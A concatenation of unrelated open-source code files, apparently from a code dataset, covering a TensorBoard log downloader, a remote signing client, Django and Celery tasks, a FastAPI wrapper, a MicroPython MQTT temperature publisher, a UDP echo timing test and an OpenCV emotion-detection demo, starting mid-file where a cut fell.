'large_standard_vocab',
'small_custom_sentencepiece_vocab',
'base_custom_sentencepiece_vocab',
'large_custom_sentencepiece_vocab',
# Only embeddings are updated
'small_embeddings_only_standard_vocab',
'base_embeddings_only_standard_vocab',
'large_embeddings_only_standard_vocab',
'small_embeddings_only_custom_sentencepiece_vocab',
'base_embeddings_only_custom_sentencepiece_vocab',
'large_embeddings_only_custom_sentencepiece_vocab',
# Double batch size for large (128 = 64 * 2)
'large_batchsize_128_custom_sentencepiece_vocab',
'large_batchsize_128_standard_vocab',
]
# all paths have the scructure
for base_path in base_paths:
size = base_path.split('_')[0]
full_path = os.path.join(GCS_BUCKET, base_path, 'models', size)
download_dir = os.path.join(TENSORBOARD_LOGS_LOCAL, base_path)
if not os.path.exists(download_dir):
os.makedirs(download_dir, exist_ok=True)
print(f'Downloading files from {full_path} to {download_dir}')
for file in tqdm.tqdm(tf.gfile.Glob(os.path.join(full_path,
"events.*"))):
tf.gfile.Copy(file,
os.path.join(download_dir, os.path.basename(file)),
overwrite=False)
else:
print(f'{base_path} logs already download. Delete folder'
f'{download_dir} and run script to download again')
| 2.265625 | 2 |
tests/TestPythonLibDir/RemotePkcs1Signer/__init__.py | q351941406/isign-1 | 83 | 10832 | import base64
import requests
class RemotePkcs1Signer(object):
""" Client-side Signer subclass, that calls the Signing Service over HTTP to sign things """
# standard headers for request
headers = {
'Content-Type': 'application/json',
'Accept': 'application/json'
}
def __init__(self, host, port, key, algorithm="SIGNATURE_RSA_PKCS1_SHA256", keyfile=None):
"""
:param host: host of the remote HTTP service
:param port: port of the remote HTTP service
:param key: see signing_service.py, in our case we use the hash of the related cert to identify the key
:param algorithm: which algorithm to use
:param keyfile: unused, this is a wart :(
"""
self.endpoint = "http://{}:{}/".format(host, port)
self.key = key
self.algorithm = algorithm
def sign(self, data):
plaintext_base64 = base64.b64encode(data)
plaintext_key = u'0'
payload = {
"key": self.key,
"plaintext": [{
"key": plaintext_key,
"value": plaintext_base64
}],
"algorithm": self.algorithm
}
response = requests.post(self.endpoint,
headers=self.__class__.headers,
json=payload).json()
signature = base64.b64decode(response[u'signature'][plaintext_key])
return signature
| 3.140625 | 3 |
architecture_tool_django/nodes/tasks.py | goldginkgo/architecture_tool_django | 1 | 10833 | import logging
import re
from celery import shared_task
from django.conf import settings
from django.db.models import Q
from django.shortcuts import get_object_or_404
from django.template.loader import get_template
from django.urls import reverse
from django.utils import timezone
from architecture_tool_django.utils.confluence_wrapper import (
MyConfluence,
tiny_to_page_id,
)
from .models import Node
logger = logging.getLogger(__name__)
def get_node_attrs(instance):
attributes = {}
schema_properties = instance.nodetype.attribute_schema.schema["properties"]
for key, value in instance.attributeSet.items():
if key in schema_properties:
if "title" in schema_properties[key]:
attributes[schema_properties[key]["title"]] = value
else:
attributes[key] = value
attributes["Domain/Subsystem or Subdomain"] = ""
attributes["Service/Component Responsible"] = instance.attributeSet["name"]
attributes["Contact"] = ""
attributes["Service/Component Status"] = instance.attributeSet["status"]
return attributes
def get_outbound_edges(instance, base_url):
outbound_edges = {}
for edge in instance.outbound_edges.all():
edgetype = edge.edge_type.edgetype
if edgetype not in outbound_edges:
outbound_edges[edgetype] = []
url = base_url + reverse("nodes:node.detail", args=[edge.target.key])
name = edge.target.attributeSet.get("name")
item = f'(<a href="{url}">{edge.target.key}</a>) {name}'
outbound_edges[edgetype].append(item)
return outbound_edges
def get_inbound_edges(instance, base_url):
inbound_edges = {}
for edge in instance.inbound_edges.all():
edgetype = edge.edge_type.edgetype
if edgetype not in inbound_edges:
inbound_edges[edgetype] = []
url = base_url + reverse("nodes:node.detail", args=[edge.source.key])
name = edge.source.attributeSet.get("name")
item = f'(<a href="{url}">{edge.source.key}</a>) {name}'
inbound_edges[edgetype].append(item)
return inbound_edges
def update_confluence(title, context, doc_url):
new_spec = get_template("misc/confluence_page.html").render(context)
tiny = re.sub(r".*\/", "", doc_url)
page_id = tiny_to_page_id(tiny)
confluence = MyConfluence()
# page = confluence.get_page_by_id(page_id, expand="version,body.storage")
# version = int(re.sub(r".*\/", "", r.json()["version"]["_links"]["self"]))
confluence.update_page(
page_id,
title,
new_spec,
parent_id=None,
type="page",
representation="storage",
minor_edit=False,
)
def update_confluence_for_component(nodekey):
instance = get_object_or_404(Node, pk=nodekey)
doc_system = instance.attributeSet.get("primaryDocumentationSystem")
doc_url = instance.attributeSet.get("docupediaPage")
if doc_system != "ARC001" or doc_url == "":
return
base_url = settings.ARCHITECTURE_TOOL_URL
attributes = get_node_attrs(instance)
outbound_edges = get_outbound_edges(instance, base_url)
inbound_edges = get_inbound_edges(instance, base_url)
if "isDomainOf" in outbound_edges:
attributes["Domain/Subsystem or Subdomain"] = outbound_edges["isDomainOf"][0]
if "isResponsibleOf" in outbound_edges:
attributes["Service/Component Responsible"] = outbound_edges["isResponsibleOf"][
0
]
if "isContactOf" in outbound_edges:
attributes["Contact"] = ", ".join(outbound_edges["isContactOf"])
image_url = "https://www.xxx.com"
title = f'({instance.key}) {instance.attributeSet["name"]} ({instance.attributeSet["status"]})'
context = {
"base_url": base_url,
"node": instance,
"attributes": attributes,
"inbound_edges": inbound_edges,
"outbound_edges": outbound_edges,
"image_url": image_url,
}
update_confluence(title, context, doc_url)
@shared_task
def update_component_page_task(nodekey):
update_confluence_for_component(nodekey)
logger.info(f"Task: Page for {nodekey} updated!")
@shared_task
def update_components_page_task():
one_h_ago = timezone.now() - timezone.timedelta(hours=1)
nodes = Node.objects.filter(Q(nodetype="component") & Q(updated__gte=one_h_ago))
for node in nodes:
update_confluence_for_component(node.key)
logger.info("Task: All components updated!")
| 1.867188 | 2 |
crosswalk/views/alias_or_create.py | cofin/django-crosswalk | 4 | 10834 | <filename>crosswalk/views/alias_or_create.py
from crosswalk.authentication import AuthenticatedView
from crosswalk.models import Domain, Entity
from crosswalk.serializers import EntitySerializer
from crosswalk.utils import import_class
from django.core.exceptions import ObjectDoesNotExist
from rest_framework import status
from rest_framework.response import Response
class AliasOrCreate(AuthenticatedView):
def post(self, request, domain):
"""
Create an alias if an entity is found above a certain match threshold
or create a new entity.
"""
user = request.user
data = request.data.copy()
query_field = data.get("query_field")
query_value = data.get("query_value")
block_attrs = data.get("block_attrs", {})
create_attrs = data.get("create_attrs", {})
return_canonical = data.get("return_canonical", True)
threshold = data.get("threshold")
scorer_class = data.get("scorer", "fuzzywuzzy.default_process")
try:
scorer = import_class("crosswalk.scorers.{}".format(scorer_class))
except ImportError:
return Response(
"Invalid scorer.", status=status.HTTP_400_BAD_REQUEST
)
try:
domain = Domain.objects.get(slug=domain)
except ObjectDoesNotExist:
return Response(
"Domain not found.", status=status.HTTP_404_NOT_FOUND
)
# Find the best match for a query
entities = Entity.objects.filter(domain=domain)
entities = entities.filter(attributes__contains=block_attrs)
entity_values = [e.attributes[query_field] for e in entities]
match, score = scorer(query_value, entity_values)
entities = entities.filter(
**{"attributes__{}".format(query_field): match}
)
if entities.count() > 1:
return Response(
"More than one alias candiate for entity.",
status=status.HTTP_403_FORBIDDEN,
)
entity = entities.first()
attributes = {
**{query_field: query_value},
**block_attrs,
**create_attrs,
}
if entity.attributes == attributes:
return Response(
"Entity appears to already exist.",
status=status.HTTP_409_CONFLICT,
)
if score > threshold:
aliased = True
alias = Entity(
attributes=attributes,
alias_for=entity,
created_by=user,
domain=domain,
)
alias.save()
if return_canonical:
while entity.alias_for:
entity = entity.alias_for
else:
aliased = False
entity = Entity(
attributes=attributes, created_by=user, domain=domain
)
entity.save()
return Response(
{
"entity": EntitySerializer(entity).data,
"created": True,
"aliased": aliased,
"match_score": score,
},
status=status.HTTP_200_OK,
)
| 2.484375 | 2 |
hoist/fastapi_wrapper.py | ZeroIntensity/Hoist | 0 | 10835 | from fastapi import FastAPI, Response, WebSocket, WebSocketDisconnect
from threading import Thread
from .server import Server
from .errors import HoistExistsError
from .error import Error
from .version import __version__
from .flask_wrapper import HTML
import uvicorn
from typing import List, Callable
from fastapi.responses import HTMLResponse, JSONResponse
class FastAPIWrapper:
"""Wrapper for FastAPI."""
@staticmethod
def make_server(*args, **kwargs) -> FastAPI:
"""Generate a FastAPI server."""
return FastAPI(*args, **kwargs)
def get_response(self, auth: str, tokens: List[str], callback: Callable, arg: str, response: Response) -> dict:
if not auth in tokens:
response.status_code = 401
return {'ERROR': 'unauthorized'}
resp, success = callback(arg)
if isinstance(resp, Error):
response.status_code = resp.code
return {'ERROR': resp.message}
if not success:
response.status_code = 500
return {'ERROR': resp}
else:
return {'RESPONSE': resp}
def add_hoist(self, app: FastAPI, handle_errors: bool = True, auth: list = [""], premade_pages: bool = True) -> FastAPI:
"""Function for setting up hoist on an app."""
if hasattr(app, 'HOIST_INTERNALSERVER'):
raise HoistExistsError('hoist is already set up on app')
app.HOIST_INTERNALSERVER = Server(app, handle_errors)
tokens: List[str] = auth.copy() # to stop collisions
app.HOIST_AUTH = tokens
app.HOIST_WRAPPER = self
@app.exception_handler(422)
def invalid_args(req, exc) -> JSONResponse:
print('a')
return JSONResponse({"ERROR": "Invalid arguments."}, status_code = 400)
@app.post('/hoist/send')
def http_send(msg: str, auth: str, response: Response) -> dict:
return self.get_response(auth, tokens, app.HOIST_INTERNALSERVER._received, msg, response)
if premade_pages:
@app.get('/hoist')
def home_get() -> str:
return HTMLResponse(
HTML.replace('{{ version }}', __version__)
)
@app.post('/hoist')
def hoist_post() -> str:
return {'RESPONSE': f'Version {__version__}'}
return app
@staticmethod
def run_server(app: FastAPI, ip: str, port: int) -> None:
"""Function for running a FastAPI server."""
uvicorn.run(app, host = ip, port = port)
def thread_server(self, app: FastAPI, ip: str, port: int) -> FastAPI:
"""Function for running a flask app with a thread."""
server: Thread = Thread(target = self.run_server, args = (app, ip, port))
server.start()
return app
def add_socket(self, app: FastAPI, route: str) -> None:
"""Function for adding a socket to a FastAPI server."""
@app.websocket(route)
async def ws(websocket: WebSocket, response: Response):
sock = app.HOIST_SOCKETS[route]
for i in sock.connect:
i()
await websocket.accept()
while True:
try:
data = await websocket.receive_text()
resp = self.get_response("", app.HOIST_AUTH, sock._received, data, response)
await websocket.send_json(resp)
except WebSocketDisconnect:
for i in sock.disconnect:
i()
break
| 2.546875 | 3 |
network/mqtt_client/main_mqtt_publisher.py | flashypepo/myMicropython-Examples | 3 | 10836 | # This file is executed on every boot (including wake-boot from deepsleep)
# 2017-1210 PePo send timestamp and temperature (Celsius) to MQTT-server on BBB
# 2017-1105 PePo add _isLocal: sensor data to serial port (False) of stored in file (True)
# 2017-0819 PePo add sensor, led and print to serial port
# 2017-0811 PePo updated: no debug, disable webrepl,
# source: https://youtu.be/yGKZOwzGePY - Tony D! MP ESP8266 HTTP examples
print('main.py executing...')
# connect to a personal Wifi network ---------
import wifinetwork as wifi
# TODO: JSON config-file with ssid:ww entry/entries
#wifi.connectTo("PePoDevNet", wifi.readPasswordFrom('pepodevnet.txt'))
print('Wifi: connect to PePoDevNet...')
wifi.connectTo("PePoDevNet")
# set the time from nptime ---------
#print('TODO: get current time from the web...')
print('getting time from the web...')
import nptime
print('... UTC time:', nptime.settime())
#print('\tTODO -local time')
# --- SUMMERTIME or not (=WINTERTIME) ---------------
_isSummerTime = False
print('... Summertime:', _isSummerTime)
# temperature ---------
import class_ds18b20
#get sensor at GPIO14
ds = class_ds18b20.DS18B20(14)
# --- location ---------------
_LOCATION = 'studyroom'
#7-segment display
import tm1637
from machine import Pin
import math
# create tm
tm = tm1637.TM1637(clk=Pin(5), dio=Pin(4))
#print('tm: ', tm)
def display_tm1637(t):
#debug: print('display: temp=', t)
tm.temperature( math.floor(t) )
# helper function: returns temperature-record as string
def temp_record(timestamp, temp):
# timestamp[3] correction for Summertime or not
def _tc(t):
correction = 1
if _isSummerTime:
correction = 2
return t + correction
data = '{0},{1},{2},{3},{4},{5},{6},{7:0.2f}\n'.format(_LOCATION, timestamp[0],timestamp[1],timestamp[2],_tc(timestamp[3]),timestamp[4],timestamp[5],temp)
return data
#''' store data in file temperature.txt
# default: 1 measuremtn per 30 seconds
def saveT2File(dt=30.0):
import time
import utime
print('saveT2File({0}) entered...'.format(dt))
# helper function to add sensor data record to file
def write_record(timestamp, temp):
f = open('temperature.txt', 'a') #append mode
#data = '{0},{1},{2},{3},{4},{5},{6},{7:0.2f}\n'.format(_LOCATION, timestamp[0],timestamp[1],timestamp[2],_tc(timestamp[3]),timestamp[4],timestamp[5],temp)
f.write( temp_record(timestamp, temp) )
f.close()
while True:
#FUTURE: led.on()
timestamp = utime.localtime()
temp = ds.celsius
display_tm1637(temp) #display
write_record(timestamp, temp) #write in file
#FUTURE: led.off()
time.sleep(dt)
# send data to MQTT-server
def send2Server(dt=30.0):
import time
import utime
from umqtt.simple import MQTTClient
#print('send2server({0}) entered...'.format(dt))
#MQTT configuration -----------------
mqtt_server = '192.168.178.40' #ip-address of MQTT-server
TOPIC_TEST = b'topic/test' # topic: debug message
TOPIC_VALUE = b'topic/value' # topic: temperature value
TOPIC = b'topic/temperature' # topic: temp-record
#helper: sends data to MTQQ-server: connect-send payload-disconnet
def sendMQTT(payload, topic=TOPIC, server= mqtt_server):
#print('sendMQTT():', payload)
c = MQTTClient("umqtt_client", server)
c.connect() #success: returns 0
#debug: conn = c.connect()
#print('MQTT connection:', conn)
c.publish(topic, payload)
c.disconnect()
#broadcasting via topic:test
payload = b'MQTT-server: {0},\nTOPIC: {1},\nCollecting temperatures...'.format(mqtt_server, TOPIC) #debug
sendMQTT(payload, TOPIC_TEST)
print(payload)
while True:
timestamp = utime.localtime()
temp = ds.celsius
#print('temperature on display')
display_tm1637(temp)
#print('broadcast temp-record')
payload = temp_record(timestamp, temp)
sendMQTT(payload)
#print('broadcast temp-value')
payload = b'{0}'.format(temp)
sendMQTT(payload, TOPIC_VALUE)
time.sleep(dt)
#main run() - by-default 1 measurement per 30 seconds
def run(dt=30.0):
#store data local (True) or send to server (False)
_isLocal = False;
try:
if _isLocal:
# watch out: file can be very large overtime
saveT2File(dt)
else:
send2Server(dt)
except:
print('collecting temperature data intercepted')
pass
# go ahead and start getting, sending/storing the sensor data
if __name__ == "__main__":
run(60.0) # 1 measurement per minute
| 2.796875 | 3 |
2015/07.py | Valokoodari/advent-of-code | 2 | 10837 | <filename>2015/07.py
#!/usr/bin/python3
lines = open("inputs/07.in", "r").readlines()
for i,line in enumerate(lines):
lines[i] = line.split("\n")[0]
l = lines.copy();
wires = {}
def func_set(p, i):
if p[0].isdigit():
wires[p[2]] = int(p[0])
lines.pop(i)
elif p[0] in wires.keys():
wires[p[2]] = wires[p[0]]
lines.pop(i)
def func_and(p, i):
if p[0].isdigit() and p[2] in wires.keys():
wires[p[4]] = int(p[0]) & wires[p[2]]
lines.pop(i)
if p[0] in wires.keys() and p[2] in wires.keys():
wires[p[4]] = wires[p[0]] & wires[p[2]]
lines.pop(i)
def func_or(p, i):
if p[0] in wires.keys() and p[2] in wires.keys():
wires[p[4]] = wires[p[0]] | wires[p[2]]
lines.pop(i)
def func_rshift(p, i):
if p[0] in wires.keys():
wires[p[4]] = wires[p[0]] >> int(p[2])
lines.pop(i)
def func_lshift(p, i):
if p[0] in wires.keys():
wires[p[4]] = wires[p[0]] << int(p[2])
lines.pop(i)
def func_not(p, i):
if p[1] in wires.keys():
wires[p[3]] = 65535 - wires[p[1]]
lines.pop(i)
def run():
i = 0
while len(lines) > 0:
parts = lines[i].split(" ")
if "AND" in parts:
func_and(parts, i)
elif "NOT" in parts:
func_not(parts, i)
elif "RSHIFT" in parts:
func_rshift(parts, i)
elif "LSHIFT" in parts:
func_lshift(parts, i)
elif "OR" in parts:
func_or(parts, i)
else:
func_set(parts, i)
i += 1
if i >= len(lines):
i = 0
run()
print("Part 1: " + str(wires["a"]))
lines = l
wires = {"b": wires["a"]}
run()
print("Part 2: " + str(wires["a"]))
| 2.8125 | 3 |
soccer_embedded/Development/Ethernet/lwip-rtos-config/test_udp_echo.py | ghsecuritylab/soccer_ws | 56 | 10838 | <reponame>ghsecuritylab/soccer_ws
import socket
import time
import numpy
# This script sends a message to the board, at IP address and port given by
# server_address, using User Datagram Protocol (UDP). The board should be
# programmed to echo back UDP packets sent to it. The time taken for num_samples
# echoes is measured.
# Create a UDP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
server_address = ('192.168.0.59', 7)
sock.bind(('', 7))
message = 'this is a message of length 80 chars. asdfghjklasdfghjklasdfghjklasdfghjkl ++++'.encode()
num_samples = 500
times = []
try:
# Send data
print('Sending "{}"'.format(message))
print('Measuring time taken for {} echoes'.format(num_samples))
total_time = 0
for i in range(num_samples):
t0 = time.perf_counter()
sent = sock.sendto(message, server_address)
# Receive response
data, server = sock.recvfrom(4096)
t1 = time.perf_counter()
dt = t1 - t0
total_time += dt
#print('received "{}"'.format(data))
times.append(dt)
f = open('times', 'a')
try:
f.write('\n')
for i in range(num_samples):
f.write('{},'.format(times[i]))
finally:
f.close()
times_array = numpy.array(times)
print('Took {} seconds for {} samples'.format(total_time, num_samples))
print('Average echo time: {} seconds'.format(numpy.average(times_array)))
print('Standard deviation: {} seconds'.format(numpy.std(times_array)))
print('Maximum: {} seconds, Minimum: {} seconds'.format(numpy.amax(times_array), numpy.amin(times_array)))
finally:
print('Closing socket')
sock.close()
| 2.96875 | 3 |
test.py | keke185321/emotions | 58 | 10839 | #!/usr/bin/env python
#
# This file is part of the Emotions project. The complete source code is
# available at https://github.com/luigivieira/emotions.
#
# Copyright (c) 2016-2017, <NAME> (http://www.luiz.vieira.nom.br)
#
# MIT License
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import argparse
import cv2
import numpy as np
from collections import OrderedDict
from datetime import datetime, timedelta
from faces import FaceDetector
from data import FaceData
from gabor import GaborBank
from emotions import EmotionsDetector
#---------------------------------------------
class VideoData:
"""
Helper class to present the detected face region, landmarks and emotions.
"""
#-----------------------------------------
def __init__(self):
"""
Class constructor.
"""
self._faceDet = FaceDetector()
'''
The instance of the face detector.
'''
self._bank = GaborBank()
'''
The instance of the bank of Gabor filters.
'''
self._emotionsDet = EmotionsDetector()
'''
The instance of the emotions detector.
'''
self._face = FaceData()
'''
Data of the last face detected.
'''
self._emotions = OrderedDict()
'''
Data of the last emotions detected.
'''
#-----------------------------------------
def detect(self, frame):
"""
Detects a face and the prototypic emotions on the given frame image.
Parameters
----------
frame: numpy.ndarray
Image where to perform the detections from.
Returns
-------
ret: bool
Indication of success or failure.
"""
ret, face = self._faceDet.detect(frame)
if ret:
self._face = face
# Crop just the face region
frame, face = face.crop(frame)
# Filter it with the Gabor bank
responses = self._bank.filter(frame)
# Detect the prototypic emotions based on the filter responses
self._emotions = self._emotionsDet.detect(face, responses)
return True
else:
self._face = None
return False
#-----------------------------------------
def draw(self, frame):
"""
Draws the detected data of the given frame image.
Parameters
----------
frame: numpy.ndarray
Image where to draw the information to.
"""
# Font settings
font = cv2.FONT_HERSHEY_SIMPLEX
scale = 0.5
thick = 1
glow = 3 * thick
# Color settings
black = (0, 0, 0)
white = (255, 255, 255)
yellow = (0, 255, 255)
red = (0, 0, 255)
empty = True
# Plot the face landmarks and face distance
x = 5
y = 0
w = int(frame.shape[1]* 0.2)
try:
face = self._face
empty = face.isEmpty()
face.draw(frame)
except:
pass
# Plot the emotion probabilities
try:
emotions = self._emotions
if empty:
labels = []
values = []
else:
labels = list(emotions.keys())
values = list(emotions.values())
bigger = labels[values.index(max(values))]
# Draw the header
text = 'emotions'
size, _ = cv2.getTextSize(text, font, scale, thick)
y += size[1] + 20
cv2.putText(frame, text, (x, y), font, scale, black, glow)
cv2.putText(frame, text, (x, y), font, scale, yellow, thick)
y += 5
cv2.line(frame, (x,y), (x+w,y), black, 1)
size, _ = cv2.getTextSize('happiness', font, scale, thick)
t = size[0] + 20
w = 150
h = size[1]
for l, v in zip(labels, values):
lab = '{}:'.format(l)
val = '{:.2f}'.format(v)
size, _ = cv2.getTextSize(l, font, scale, thick)
# Set a red color for the emotion with bigger probability
color = red if l == bigger else yellow
y += size[1] + 15
p1 = (x+t, y-size[1]-5)
p2 = (x+t+w, y-size[1]+h+5)
cv2.rectangle(frame, p1, p2, black, 1)
# Draw the filled rectangle proportional to the probability
p2 = (p1[0] + int((p2[0] - p1[0]) * v), p2[1])
cv2.rectangle(frame, p1, p2, color, -1)
cv2.rectangle(frame, p1, p2, black, 1)
# Draw the emotion label
cv2.putText(frame, lab, (x, y), font, scale, black, glow)
cv2.putText(frame, lab, (x, y), font, scale, color, thick)
# Draw the value of the emotion probability
cv2.putText(frame, val, (x+t+5, y), font, scale, black, glow)
cv2.putText(frame, val, (x+t+5, y), font, scale, white, thick)
except Exception as e:
print(e)
pass
#---------------------------------------------
def main(argv):
"""
Main entry of this script.
Parameters
------
argv: list of str
Arguments received from the command line.
"""
# Parse the command line
args = parseCommandLine(argv)
# Loads the video or starts the webcam
if args.source == 'cam':
video = cv2.VideoCapture(args.id)
if not video.isOpened():
print('Error opening webcam of id {}'.format(args.id))
sys.exit(-1)
fps = 0
frameCount = 0
sourceName = 'Webcam #{}'.format(args.id)
else:
video = cv2.VideoCapture(args.file)
if not video.isOpened():
print('Error opening video file {}'.format(args.file))
sys.exit(-1)
fps = int(video.get(cv2.CAP_PROP_FPS))
frameCount = int(video.get(cv2.CAP_PROP_FRAME_COUNT))
sourceName = args.file
# Force HD resolution (if the video was not recorded in this resolution or
# if the camera does not support it, the frames will be stretched to fit it)
# The intention is just to standardize the input (and make the help window
# work as intended)
video.set(cv2.CAP_PROP_FRAME_WIDTH, 1280);
video.set(cv2.CAP_PROP_FRAME_HEIGHT, 720);
# Create the helper class
data = VideoData()
# Text settings
font = cv2.FONT_HERSHEY_SIMPLEX
scale = 1
thick = 1
glow = 3 * thick
# Color settings
color = (255, 255, 255)
paused = False
frameNum = 0
# Process the video input
while True:
if not paused:
start = datetime.now()
ret, img = video.read()
if ret:
frame = img.copy()
else:
paused = True
drawInfo(frame, frameNum, frameCount, paused, fps, args.source)
data.detect(frame)
data.draw(frame)
cv2.imshow(sourceName, frame)
if paused:
key = cv2.waitKey(0)
else:
end = datetime.now()
delta = (end - start)
if fps != 0:
delay = int(max(1, ((1 / fps) - delta.total_seconds()) * 1000))
else:
delay = 1
key = cv2.waitKey(delay)
if key == ord('q') or key == ord('Q') or key == 27:
break
elif key == ord('p') or key == ord('P'):
paused = not paused
elif args.source == 'video' and (key == ord('r') or key == ord('R')):
frameNum = 0
video.set(cv2.CAP_PROP_POS_FRAMES, frameNum)
elif args.source == 'video' and paused and key == 2424832: # Left key
frameNum -= 1
if frameNum < 0:
frameNum = 0
video.set(cv2.CAP_PROP_POS_FRAMES, frameNum)
elif args.source == 'video' and paused and key == 2555904: # Right key
frameNum += 1
if frameNum >= frameCount:
frameNum = frameCount - 1
elif args.source == 'video' and key == 2162688: # Pageup key
frameNum -= (fps * 10)
if frameNum < 0:
frameNum = 0
video.set(cv2.CAP_PROP_POS_FRAMES, frameNum)
elif args.source == 'video' and key == 2228224: # Pagedown key
frameNum += (fps * 10)
if frameNum >= frameCount:
frameNum = frameCount - 1
video.set(cv2.CAP_PROP_POS_FRAMES, frameNum)
elif key == 7340032: # F1
showHelp(sourceName, frame.shape)
if not paused:
frameNum += 1
video.release()
cv2.destroyAllWindows()
#---------------------------------------------
def drawInfo(frame, frameNum, frameCount, paused, fps, source):
"""
Draws text info related to the given frame number into the frame image.
Parameters
----------
image: numpy.ndarray
Image data where to draw the text info.
frameNum: int
Number of the frame of which to drawn the text info.
frameCount: int
Number total of frames in the video.
paused: bool
Indication if the video is paused or not.
fps: int
Frame rate (in frames per second) of the video for time calculation.
source: str
Source of the input images (either "video" or "cam").
"""
# Font settings
font = cv2.FONT_HERSHEY_SIMPLEX
scale = 0.5
thick = 1
glow = 3 * thick
# Color settings
black = (0, 0, 0)
yellow = (0, 255, 255)
# Print the current frame number and timestamp
if source == 'video':
text = 'Frame: {:d}/{:d} {}'.format(frameNum, frameCount - 1,
'(paused)' if paused else '')
else:
text = 'Frame: {:d} {}'.format(frameNum, '(paused)' if paused else '')
size, _ = cv2.getTextSize(text, font, scale, thick)
x = 5
y = frame.shape[0] - 2 * size[1]
cv2.putText(frame, text, (x, y), font, scale, black, glow)
cv2.putText(frame, text, (x, y), font, scale, yellow, thick)
if source == 'video':
timestamp = datetime.min + timedelta(seconds=(frameNum / fps))
elapsedTime = datetime.strftime(timestamp, '%H:%M:%S')
timestamp = datetime.min + timedelta(seconds=(frameCount / fps))
totalTime = datetime.strftime(timestamp, '%H:%M:%S')
text = 'Time: {}/{}'.format(elapsedTime, totalTime)
size, _ = cv2.getTextSize(text, font, scale, thick)
y = frame.shape[0] - 5
cv2.putText(frame, text, (x, y), font, scale, black, glow)
cv2.putText(frame, text, (x, y), font, scale, yellow, thick)
# Print the help message
text = 'Press F1 for help'
size, _ = cv2.getTextSize(text, font, scale, thick)
x = frame.shape[1] - size[0] - 5
y = frame.shape[0] - size[1] + 5
cv2.putText(frame, text, (x, y), font, scale, black, glow)
cv2.putText(frame, text, (x, y), font, scale, yellow, thick)
#---------------------------------------------
def showHelp(windowTitle, shape):
"""
Displays an image with helping text.
Parameters
----------
windowTitle: str
Title of the window where to display the help
shape: tuple
Height and width of the window to create the help image.
"""
# Font settings
font = cv2.FONT_HERSHEY_SIMPLEX
scale = 1.0
thick = 1
# Color settings
black = (0, 0, 0)
red = (0, 0, 255)
# Create the background image
image = np.ones((shape[0], shape[1], 3)) * 255
# The help text is printed in one line per item in this list
helpText = [
'Controls:',
'-----------------------------------------------',
'[q] or [ESC]: quits from the application.',
'[p]: toggles paused/playing the video/webcam input.',
'[r]: restarts the video playback (video input only).',
'[left/right arrow]: displays the previous/next frame (video input only).',
'[page-up/down]: rewinds/fast forwards by 10 seconds (video input only).',
' ',
' ',
'Press any key to close this window...'
]
# Print the controls help text
xCenter = image.shape[1] // 2
yCenter = image.shape[0] // 2
margin = 20 # between-lines margin in pixels
textWidth = 0
textHeight = margin * (len(helpText) - 1)
lineHeight = 0
for line in helpText:
size, _ = cv2.getTextSize(line, font, scale, thick)
textHeight += size[1]
textWidth = size[0] if size[0] > textWidth else textWidth
lineHeight = size[1] if size[1] > lineHeight else lineHeight
x = xCenter - textWidth // 2
y = yCenter - textHeight // 2
for line in helpText:
cv2.putText(image, line, (x, y), font, scale, black, thick * 3)
cv2.putText(image, line, (x, y), font, scale, red, thick)
y += margin + lineHeight
# Show the image and wait for a key press
cv2.imshow(windowTitle, image)
cv2.waitKey(0)
#---------------------------------------------
def parseCommandLine(argv):
"""
Parse the command line of this utility application.
This function uses the argparse package to handle the command line
arguments. In case of command line errors, the application will be
automatically terminated.
Parameters
------
argv: list of str
Arguments received from the command line.
Returns
------
object
Object with the parsed arguments as attributes (refer to the
documentation of the argparse package for details)
"""
parser = argparse.ArgumentParser(description='Tests the face and emotion '
'detector on a video file input.')
parser.add_argument('source', nargs='?', const='Yes',
choices=['video', 'cam'], default='cam',
help='Indicate the source of the input images for '
'the detectors: "video" for a video file or '
'"cam" for a webcam. The default is "cam".')
parser.add_argument('-f', '--file', metavar='<name>',
help='Name of the video file to use, if the source is '
'"video". The supported formats depend on the codecs '
'installed in the operating system.')
parser.add_argument('-i', '--id', metavar='<number>', default=0, type=int,
help='Numerical id of the webcam to use, if the source '
'is "cam". The default is 0.')
args = parser.parse_args()
if args.source == 'video' and args.file is None:
parser.error('-f is required when source is "video"')
return args
#---------------------------------------------
# namespace verification for invoking main
#---------------------------------------------
if __name__ == '__main__':
main(sys.argv[1:]) | 1.617188 | 2 |
konform/cmd.py | openanalytics/konform | 7 | 10840 | from . import Konform
def main():
Konform().run()
| 1.101563 | 1 |
ichnaea/taskapp/app.py | mikiec84/ichnaea | 348 | 10841 | """
Holds global celery application state and startup / shutdown handlers.
"""
from celery import Celery
from celery.app import app_or_default
from celery.signals import (
beat_init,
worker_process_init,
worker_process_shutdown,
setup_logging,
)
from ichnaea.log import configure_logging
from ichnaea.taskapp.config import (
configure_celery,
init_beat,
init_worker,
shutdown_worker,
)
@setup_logging.connect
def setup_logging_process(loglevel, logfile, format, colorize, **kwargs):
"""Called at scheduler and worker setup.
Configures logging using the same configuration as the webapp.
"""
configure_logging()
@beat_init.connect
def init_beat_process(signal, sender, **kw):
"""
Called automatically when `celery beat` is started.
Calls :func:`ichnaea.taskapp.config.init_beat`.
"""
celery_app = app_or_default()
init_beat(sender, celery_app)
@worker_process_init.connect
def init_worker_process(signal, sender, **kw):
"""
Called automatically when `celery worker` is started. This is executed
inside each forked worker process.
Calls :func:`ichnaea.taskapp.config.init_worker`.
"""
# get the app in the current worker process
celery_app = app_or_default()
init_worker(celery_app)
@worker_process_shutdown.connect
def shutdown_worker_process(signal, sender, **kw):
"""
Called automatically when `celery worker` is stopped. This is executed
inside each forked worker process.
